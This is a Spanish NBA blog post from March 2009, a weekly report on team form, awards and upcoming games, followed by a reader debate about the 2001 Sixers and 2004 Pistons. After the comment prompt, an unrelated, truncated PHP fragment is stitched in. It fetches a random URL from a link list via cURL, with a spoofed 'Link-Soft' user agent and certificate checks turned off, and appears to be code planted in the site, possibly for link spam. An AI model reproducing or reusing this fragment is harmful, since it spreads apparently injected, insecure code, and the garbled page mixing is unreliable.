INFORME SEMANAL TJNBA (Semana 19)

09 de March de 2009 por TheDeerHunter

Semana marcada fundamentalmente por la intensa batalla “fraticida” en el Este y por la ¿definitiva? caída en desgracia de Phoenix.

ON FIRE

Los Lakers recuperan el liderato sin esfuerzo y son los primeros en lograr 50 victorias a falta de 20 partidos por jugar. Esta semana no están aquí por méritos propios pero absolutamente todos sus rivales han perdido paso en relación a ellos.

Probablemente, los dos equipos en mejor estado de forma de la liga son Utah y New Orleans. Cuidado, porque hasta hace muy poco hablábamos de ellos como posibles cocos de la parte baja del cuadro del Oeste y ahora lo tienen todo de cara para enganchar ventaja campo en primera ronda lo que supone una pésima noticia para sus rivales. A poco que lleguen sanos a finales de abril serán verdaderos huesos. Sin embargo, el mejor equipo de la semana ha sido Orlando, con un calendario que ha incluido victorias en Philadelphia y Boston, más los Suns de postre. Alston se ha acoplado perfectamente a su papel y minimiza el problema que tienen en la posición de base. No es Nelson pero sin él ahora mismo, teniendo la 3ª plaza del Este más que asegurada, pocos dudan que como mínimo igualarán el resultado del año pasado. A partir de ahí a soñar… y si no, tienen excusa.

Otro equipo en estado de gracia es Charlotte. 6 victorias seguidas para ellos, muchas de ellas contra rivales directos. Si finalmente logran meter la nariz en postemporada será la gran sorpresa de este año, otro milagro de manos de Larry Brown y un punto positivo para Jordan, cerrándonos a algunos la boca por completo. Lo mejor de todo, pase lo que pase, es que de la banda que había hace nada ahora suman entre todos. Los números de Okafor, Felton, Wallace, Diaw, Augustine, Bell,etc… así lo demuestran.

Por último, los Rockets han logrado estabilizar a un buen nivel su situación. Ponerse terceros en el Oeste con todo lo que les ha llovido es todo un éxito.

AL TRAN-TRAN

Tanto Cleveland, como Boston han jugado bien, máxime si tenemos en cuenta bajas importantes que arrastran ambos equipos. ¿Qué problema hay? Pues que sus rivales han jugado mejor y que no sólo no han logrado hacer progresar su situación particular sino que ha empeorado. La situación en ambos casos está lejos de ser crítica pero para los objetivos que ambos persiguen no podemos ignorar que sí es delicada. Cruzarse con Orlando en 2ª ronda y afrontar unas posibles finales de conferencia y de NBA con desventaja campo efectivamente son situaciones no deseables para nadie.

Caso distinto es el de San Antonio. Acostumbrados a vivir en letargo los momentos más decisivos de la temporada regular, no les afecta ni lo más mínimo darle la ventaja a Lakers o a quien corresponda. Es difícil vislumbrar cualquier otra situación que no sea la final de conferencia.

A ellos debemos unir una larga lista de equipos moviéndose alrededor del 50% en una situación relativamente cómoda. Hablamos de Miami, Atlanta, Portland, Detroit o Philadelphia.

EL BORDE DEL ABISMO

A estas alturas ya se ha vendido casi todo el pescado de la regular y la frontera entre el éxito y el fracaso cada vez queda más clara para todos los equipos. El único atisbo de duda gira en torno a la última plaza del Este y los seis equipos que pelean por ella (incluyendo a Charlotte, por supuesto). El premio probablemente no sea más que una única ronda de playoffs. No parece gran cosa a primera vista pero es un gran paso para los proyectos de los que hablamos.

A río revuelto ganancia de pescadores y con hacer una semana ganadora el golpe puede ser importante. De momento Chicago, con un 2-1, ha logrado meterse a costa de los Bucks, que han terminado por desinflarse un poco.

Unos buenos Pacers, los Nets o incluso los Knicks todavía se mantienen ahí.

Mención a parte para Denver. Tras haber liderado prácticamente toda la temporada la Northwest y en el peor momento para hacerlo flaquean irremediablemente. A ver si va a resultar que su principal problema no era Iverson.

EL POZO

A pesar de Shaq los Suns caen inexorablemente al pozo. Demasiado mal se han hecho las cosas desde hace ya algún tiempo y la reacción cada vez es más difícil. 4 partidos de desventaja parecen una diferencia casi insalvable con apenas 20 partidos por jugarse. Su inmediato rival, Dallas, gana un 60% de los mismos. A expensas de un terremoto podemos decir que los Shaq, Nash y el resto están virtualmente fuera de postemporada. Muy fuerte.

Del resto, sin novedad en el frente. Los Raptors han terminado de claudicar y del resto, lo único que podemos rescatar es el buen tramo final de los Thunder, con casi un 50% en los últimos 10 partidos. Dada su situación, es una actitud que les honra. Lo normal es hacer lo que está haciendo el resto… pelear por ganar el mínimo número de partidos posibles.

PREMIOS SEMANALES

MVP: No nos hace falta ver el balance semanal de su equipo, ni nos importa lo más mínimo. La semana de Dwyane Wade ha sido de escándalo y el premio es suyo. En cuatro partidos, Wade ha promediado 35.8 puntos con un 56.7% de acierto, 11.3 asistencias, 6.8 rebotes y 3.3 robos para reforzar su candidatura al MVP de la regular season.

El rookie: Qué semana la de Marc Gasol. 21.3 puntos con un impresionante 72% de acierto en tiros de campo y 80% en libres, 9.8 rebotes, 4 asistencias, 2.8 tapones y 1 robo, números que lo sitúan entre la elite de la liga.

La sorpresa: Los Pacers funcionan a un nivel inimaginable sin Granger ni Dunleavy. Y es, en buena medida, gracias a Jarrett Jack, que esta semana ha promediado 22.7 puntos, 4.7 asistencias, 3.7 rebotes y 2 robos.

La decepción: Al margen de los Suns, que en plena lucha por meterse en Playoffs se han permitido el lujo de perder cuatro partidos seguidos, nos sorprenden los números de Shane Battier. Vale que mucha de su aportación está en los intangibles, pero sus cifras son inconcebibles para alguien que juega entre 30 y 40 minutos por partido: 3.3 puntos (con un 21.7% de acierto), 4 rebotes, 1.8 asistencias, 1 robo de media en los últimos cuatro partidos. Además, Battier ha fallado sus últimos 18 triples.

RAZONES PARA TRASNOCHAR

De los seis partidos que se disputan esta próxima madrugada, cinco enfrentan a equipos que están en posiciones de Playoffs. Destacamos, como siempre, un encuentro y un jugador:

Magic @ Pistons (1:30 h. GMT+1). Ahora mismo éste sería uno de los cruces de primera ronda,  cosa que supondría un dudoso premio para la magnífica temporada que están realizando los Magic. Rafer Alston se ha adaptado perfectamente al juego de los de Stan Van Gundy y parece haber amortiguado la ausencia de Nelson. Los Pistons frenaron su racha de derrotas cuando Iverson se lesionó (aunque vienen de perder en Atlanta) y no parece que Bucks, Nets o Pacers estén en condiciones de amenazarles. Su objetivo ahora ha de ser la cuarta posición del Este, que tiene como premio evitar a Orlando y estará entre ellos, los Hawks, los Heat y los Sixers.

Dwyane Wade. Los Heat reciben a los Bulls, y Wade es natural de Chicago. ¿Alguien duda de que esta noche (1:30 h. GMT+1) asistiremos a una nueva exhibición de Flash?

Comenta

11 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Hablais de ‘otro’ milagro para Larry Brown ¿cual fue el anterior o anteriores?

    Los Rockets se colocan terceros en gran medida gracias a Scola que en la racha de 10-2 que llevan promedia 15 puntos y 11.3 rebotes con un 56.5% en tiros de campo en 33 minutos de juego. Gran nivel el que esta dando el argentino….el que tiene.

      Citar

  2. TheDeerHunter dice:
    #2

    Pues dado que tú mismo defines a Iverson como un paquete (o un cáncer según tus propias palabras) cuando era el indiscutible “all-around” de un equipo compuesto por super-estrellas de la categoría de McKey, Linch y Snow (grandes profesionales y mejores personas) y que fué capaz de llevar a ese equipo nada menos que a la final de la NBA (que otros ilustres no han catado ni catarán en la vida…) y ganado algún partido, creo que ya sabías a qué primer milagro nos referíamos.

    Por los índices en las casas de apuestas, el título de Detroit contra los Lakers de “los 4 fantásticos” debería ser cosiderado objetivamente como otro milagro más. Supongo que los que pillaron pasta a almorzás con aquella jugada estarán de acuerdo conmigo.

      Citar

  3. TheDeerHunter dice:
    #3

    Espera… que de Tyronne Hill ni me acordaba

    Dios, qué plantilla

      Citar

  4. TheDeerHunter dice:
    #4

    juasss y de pívot reserva McCulloch!!!!
    qué recuerdos

      Citar

  5. Viva_Dirk dice:
    #5

    Los Pistons no ganaron a ningunos 4 fantásticos, Malone no estaba y Payton casi tampoco. A parte esos Pistons me parecian un gran equipo. Brown sabe construir defensas y aquel equipo estaba hecho para eso y luego en ataque tenia talento también para repartir. No creo que fuese ningun milagro, sobre todo porque no estaba Malone.

    Y ya suponia que hablarias de eso y sacarias a relucir los nombres de Snow, McKie y Lynch, lo que me gustaria saber es si eran mejores los siguientes trios: Charlie Ward, Chris Child y Othella Harrington; Alvin Williams, Mo Pete(en su año rookie) y Keon Clark; Travis Best, Austin Croshere y Sam Perkins; Lindsay Hunter, Jason Caffey y Earvin Johnson; Bruce Bowen, Anthony Carter y A.C.Green(con 37 años). Desde luego ninguno de esos recibió el premio al mejor 6º hombre del año y McKie si.

    Además no te acordaba de Tyronne Hill que acabó aquel año promediando casi doble-doble y era uno de los máximos reboteadores ofensivos de la liga. No creo que Brown ni Iverson lo hubiesen cambiado por Kurt Thomas, Bo Outlaw o Al Harrington(con 20 años).

    Y desde luego ningun equipo del Este tuvo un pivot que promediase en aquellos play-offs 14-14, 3 tapones y que habia sido nombrado el mejor defensor del año. Supongo que cuando juegas a defender eso cuenta. Mutombo era el mejor pivot de la conferencia y los Sixers notaron su llegada.

    Vamos, que no era ningun equipazo, pero no habia ninguno mejor en el Este. Y ojo que tenian a Kukoc amargado, salió de allí y en los restantes 17 partidos de la temporada se fue a 19.7 puntos, 5.7 rebotes y 6.2 asistencias. Hasta que no cumplió 36 años, Kukoc jamás anotó menos que aquellos partidos al lado de Iverson.

      Citar

  6. TheDeerHunter dice:
    #6

    No termino de entender porqué nuestros recuerdos sobre lo mismo son tan distintos…

    No seré yo quien minusvalore aquel equipo de Detroit. Me tocó sufrirlo en carne viva y les respeto profundamente. Sobre los Lakers, yo sí recuerdo que jugaron todos aquella final. Creo que el sí faltó a la cita fue Horacio… pero vi lamentablemente arrastrarse a Payton que no tenía ningún problema físico y sufrir de lo lindo a Malone, éste sí con múltiples problemas. Lo que más recuerdo claramente fue que nadie en todo el planeta baloncestístico hubiera apostado ni un sólo centavo por los Pistons y que ese ultra-favoritismo tuvo eco en las retransmisiones de Daimiel y Montes. También recuerdo que el rebolcón que nos dieron que fue morrocotudo desde el primer partido al último… como la categoría y fama como jugadores que tenían ambos Wallace, Billups o el mismísimo Hamilton antes de la mano de Brown… completamente alejada de la que tienen ahora. Me parecen un caso único.

    Sobre la Philadelphia de Iverson… he mentado a Snow, McKey, Lynch, Hill, McCulloch, Bell… y algún otro paquete que no recuerdo. Kukoc ¿amargado?? creo recordar que apenas jugó nada… al menos en aquella final ni un poquito (la culpa la tuvo Iverson que mandó lesionarlo, creo… fue para que su progresión como jugador de futuro no le impidiera ser la estrella del equipo)
    Te recuerdo que los Pacers fueron dignos rivales de L.A el año anterior y poco antes le habían tocado la cara al mismísimo Jordan… o los Knicks con algún que otro jugador además de los que has mencionado tú que tenían los cataplines pelaos de jugar playoffs año tras año además de alguna final… pero es que incluso has llegado a comparar a varios campeonesde la NBA con un 6º hombre como McKey (que por lo visto no notaba tanto el egoísmo de Iverson para llegar a serlo) y aquellos Bucks no eran mancos ni muchísimo menos.
    No me alcanza la memoria para recordar exáctamente aquellas plantillas, pero vamos lo que sí te aseguro que Brown hubiera vendido a su madre y la mitad de su padre por tener a aquel Kurt Thomas en lugar de a Hill.

    Sobre Mutombo. Tenía su valor pero tampoco lo pintes como un crack de la galaxia y con Theo Ratliff también iban primeros del Este.

      Citar

  7. Miguel dice:
    #7

    La que se ha montado por seis victorias cosecutivas de los Bobcats.

      Citar

  8. Viva_Dirk dice:
    #8

    No se monta ninguna, a mi me gustan mucho estas discusiones.

    Si si, yo también recuerdo que los Lakers eran muy favoritos antes de la final, pero recuerdo cuando Malone empezó a tener problemas físicos que la euforia bajó bastante. Si que fue una sorpresa como ya he dicho, pero creo que eran un muy buen equipo y no fue ningun milagro de Brown.

    Lo de los Sixers, he comparado las temporadas de los que tu has dicho, yo también podria nombrar a mas paquetes, he nombrado a los que mas jugaban para no engañar al personal, porque tu has nombrado por ejemplo a McCulloch que jugaba menos de 10 minutos por partido, es como si yo digo que los Spurs ganaron un anillo con Tony Massemburg de pivot suplente. Y lo de Kukoc es evidente que no jugó los play-offs porque lo traspasaron y cuando los traspasaron hizo esos números que he puesto, asi que no sería tan malo como para no jugar.

    Los Pacers que fueron dignos rivales de LA tenian a Rick Smith y Dale Davis como pareja interior y habian ganado 15 partidos mas que los que perdieron contra Iverson. Los Bucks no eran mancos, pero no eran mejores que los Sixers.

    Y en lo único que dices estar seguro te equivocas de pleno 😛 Hill era muchísimo mas adecuado para el juego de los Sixers que aquel Kurt Thomas ya que era mejor defensor y mucho mejor reboteador.

    Yo no digo que Mutombo sea un crack de la galaxia, digo que era el mejor center del Este con bastante diferencia, y si no es así dime quien era mejor. Y además era perfecto para el juego de Brown y Iverson. Porque como he dicho Iverson me parece que limita a los equipos en los que juega, pero si hay un tipo de equipo en el que Iverson puede funcionar es ese, mucha defensa(donde el es muy bueno), posesiones largas y que se la tire el y rodeandole buenos reboteadores(Mutombo/Ratliff, Hill, Lynch).

    Esa formula en temporadas normales les dio para meterse en play-offs, y cuando se encontraron con ese panorama lo aprovecharon al máximo, que también tiene su mérito desde luego, lo que no voy a decir es que lo hizo con un equipo que hubiera sido último del este si lo cambias a el por Michael Finley, por decir uno que ya ha salido.

      Citar

  9. Txusma dice:
    #9

    Yo creo q si un equipo con Felton-Bell-Wallace-Diaw-Okafor obtiene 6 victorias seguidas, algo de merito tiene el entrenador, aunq es bien cierto que tampoco han sido contra equipos super potentes (chicago y atlanta los mas destacados)

      Citar

  10. TheDeerHunter dice:
    #10

    Tienes que reconocer, Viva, que antes de Brown muy pocos hubieran imaginado que Billups iba a convertirse en un primera espada de la liga… es más, casi diría que muchos todavía no “nos creemos” lo que Billups ha terminado siendo. También había muchísimas dudas de que Sheed pudiera acoplarse a un equipo campeón (que de su calidad nadie ha dudado nunca) y mucho más que un hombre como Ben Wallace pudiera ser importante. A Hamilton, sin ir más lejos tampoco ha tenido nunca el cartel que debería haber tenido y Prince, sencillamente era rookie. Hasta aquella final nadie sabía lo buenos que eran… y por eso fue un milagro que ganaran.
    Malone, de hecho… hincó la rodilla por los problemas físicos cuando ya nada se podía hacer. Antes de eso peleó como un jabato. Payton no.

    Con respecto a la calidad de los equipos… el problema es que durante esa época el camino que tomó el Este (no sólo Philadelphia) fue el de los sistemas ultra-defensivos y ahí más que jugadores había equipos perros como ellos sólos y verlos era un suplicio, por cierto. El decir que Mutombo-Hill era una pareja importante en esa conferencia es cierto… pero su importancia giraba en torno a muy poquito, que era la importancia ofensiva que le daba nadie a un determinado tipo de juego.
    El juego de los Bucks giraba en torno al tridente Cassell, Ray Allen, Glen Doc Robinson, que es un quinteto más digno que muchos de los de ahora y Caffey y Erving Johnson cumplían poquito menos que lo podían hacer T.Hill&Mutombo.

    Y yo sí creo que aquellos Sixers jamás hubieran llegado a la final con alguien que no hubiera sido Iverson… ni siquiera con Lebron o con Kobe, fíjate lo que te digo.

    Por cierto… al final de temporada habrá que volver a revisar los pronósticos, que algunos de los míos están subiendo de nota por momentos.

      Citar

  11. Viva_Dirk dice:
    #11

    Bueno Txus a mi es que ese quinteto me parece para pelear los play-offs, como me lo parecía antes del trade.

    Ese es tu punto de vista sobre aquellos Pistons Deer. Yo recuerdo que cuando ficharon a Sheed hubo algunos de nosotros(encabezados por Gallis) que dijimos que era un fichaje que les ponía al máximo nivel. Aunque claro si Ben Wallace que fue varias veces seguidas el mejor defensor de la liga no era un hombre importante no hay nada mas que discutir.

    En lo otro, para acabar, Mutombo solo aportaba mas que Caffey+Erving, que eran malísimos. Desde luego aquel equipo fue diseñado para jugar con Iverson, pero si hubieses cambiado a Iverson y Kobe de equipo, dudo que los Lakers hubiesen llegado a la final, pues no hará falta recordarte los milagros(esto si son milagros) que hizo Kobe antes de llegar a la final. Resumiendo, tuvo mérito lo de los Sixers, como lo de cualquiera que juega una final, pero no fue ni de lejos un milagro ya que contaban con el mejor center y una defensa muy dura.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>